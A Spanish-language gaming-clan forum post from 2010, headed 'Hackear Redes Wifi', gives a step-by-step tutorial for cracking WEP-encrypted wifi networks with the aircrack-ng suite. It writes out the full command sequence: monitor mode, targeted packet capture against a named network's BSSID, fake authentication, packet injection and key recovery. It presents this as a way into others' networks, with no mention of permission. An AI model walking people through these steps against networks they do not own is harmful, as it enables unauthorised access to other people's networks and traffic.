Hola,

Bienvenido al foro oficial del clan Seccion 9.

Registrate y habla con todos los miembros, postea todo lo quieras, unete al clan....

¡Todo eso solo si te registras!

Y ademas una vez que te registres, no saldra publicidad de otras web, aparte de PlayAndorra que son nuestros aliados.

Saludos,

Unirse al foro, es rápido y fácil

Hola,

Bienvenido al foro oficial del clan Seccion 9.

Registrate y habla con todos los miembros, postea todo lo quieras, unete al clan....

¡Todo eso solo si te registras!

Y ademas una vez que te registres, no saldra publicidad de otras web, aparte de PlayAndorra que son nuestros aliados.

Saludos,
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Hackear Redes Wifi (Probado por mi) (POR ROAL)

Ir abajo

Hackear Redes Wifi (Probado por mi) (POR ROAL) Empty Hackear Redes Wifi (Probado por mi) (POR ROAL)

Mensaje por Lorenzoi Lun Dic 20, 2010 11:11 am

Hola hoy les presento como hackear redes wifi con clave web Very Happy ya que las WPA son muy dificiles y no me apetece subir ningun diccionario de 180 millones de posibles claves

Nota: Actualmente yo uso mi propia distribución de linux con programas hechos por mi pero este servira
Nota 2: Esto solo sirve para linux

Aqui va el tutorial:

1º: Descargar la ISO de Ubuntu (Linux) e instalarla Aqui

2º: Hacer particion Aqui o instalarla desde windows Aqui

3º Una vez hecho todo y entrados en la interfaz (escritorio) instalen aircrack-ng en su PC con Ubuntu (Linux) dede la terminal: sudo apt-get install aircrack-ng o también puede ser sudo aptitude install aircrack-ng (Para entrar a la terminal "Aplicaciones - Accesorios - Terminal")

4º Por ultimo empezamos con el tutorial finalmente.


Hackear Redes Wifi (Probado por mi) (POR ROAL) Aircrack-logo

Descripción


En español y en simples palabras, aircrack-ng es una suite de herramientas que nos permiten auditar redes inalámbricas.

Básicamente, lo que voy a mostrar es cómo encontrar la clave de una red wifi cifrada con WEP. Las herramientas que utilizaremos serán airmon-ng, airodump-ng, aireplay-ng y aircrack-ng.


  1. airmon: La usaremos para levantar nuestra interfáz wifi en modo monitor
  2. airodump: Para capturar los paquetes que recibe nuestra intefáz en modo monitor
  3. aireplay: Para crear una autentificación falsa y poder inyectar paquetes, si es que nuestro hardware lo permite
  4. aircrack: Para interpretar los datos capturados con airodump y poder obtener la clave

El primer paso será setear nuestra interfáz wifi en modo monitor, ejecutamos:
# airmon-ng start wlan0
Cambiamos wlan0 por el nombre de nuestra interfáz de red wireless (la podemos ver ejecutando iwconfig). Yo usaré wlan0 para todos los ejemplos. Veremos que se creo otra interface llamada mon0 o algo similar.
Este paso se puede realizar de varias formas dependiendo del driver que usemos, generalmente para las atheros o para las que usen el driver madwifi, tenemos que usar wlanconfig.
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Algunos drivers nos permiten cambiar el estado a monitor directamente usando iwconfig:
# iwconfig wlan0 mode monitor
Bueno, una véz lista nuestra interfáz en modo monitor tenemos que ejecutar la utilidad que nos permitirá capturar los datos que están volando. Ejecutamos:

# airodump-ng wlan0
Veremos una pantalla similar a:

Hackear Redes Wifi (Probado por mi) (POR ROAL) 1

De izq. a derecha tenemos:
bssid: mac del access point
beacons: paquetes “basura”
#Data: paquetes útiles
#/s: paquetes por segundo
CH: canal
Enc: cifrado
ESSID: nombre de la señal

Nuestro objetivo es la red llamada “club”. Entonces ejecutamos airodump-ng con los parámetros necesarios para que se encoque unicamente en su mac y su canal.

# airodump-ng -w output --channel 6 --bssid 00:02:CF:B4:DC:5B wlan0

-w : archivo para guardar los datos capturados
–channel: el canal
–bssid: la mac del access point

Utilizaremos dos herramientas más para la inyección de paquetes. La inyección de paquetes nos sirve par “obligar” al roueter a que trafique y nos envie los #Data que necesitamos.
Primero, utilizaremos aireplay-ng para generar una autentificación falsa.

# aireplay-ng -1 64 -a 00:02:CF:B4:DC:5B -h 00:1E:65:CB:29:64 wlan0

Pasamos la MAC de nuestro objetivo bajo el parametro -a y nuestra MAC mediante -h. Con -1 indicamos que usaremos el modo de ataque numero 1.

Mientras esperamos que se generere la autentificación false, dejamos corriendo el aireplay en modo de ataque 3, para que inyecte paquetes.

# aireplay-ng -3 -b 00:02:CF:B4:DC:5B -h 00:1E:65:CB:29:64 wlan0

No explicaré detalladamente los tipos de ataques o los argumentos del aireplay, para eso pueden hacer
# aireplay-ng --help
o bien leer el man.

Cuando tengamos todos los ataques corriendo y el airodump capturando paquetes, podremos ver una pantalla como:

Hackear Redes Wifi (Probado por mi) (POR ROAL) 2

Si nos damos cuenta, podemos ver que el campo #/s esta en 500 lo que quiere decir que esta capturando 500 paquetes por segundo. Con 5 mil o 10 mil paquetes, ya deberiamos tener la password. En el peor de los casos con 20 o 40 mil. El campo #Data nos indica cuantos paquetes hemos capturado.

Por mientras, en otra consola podemos ejecutar el aircrack para que interprete los datos capturados y nos muestre la password WEP.

# aircrack-ng output*.cap

Hackear Redes Wifi (Probado por mi) (POR ROAL) 3
Listo, ya tenemos la clave.

Lorenzoi

Cantidad de envíos : 40
Reputación : 3
Fecha de inscripción : 13/12/2010

Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.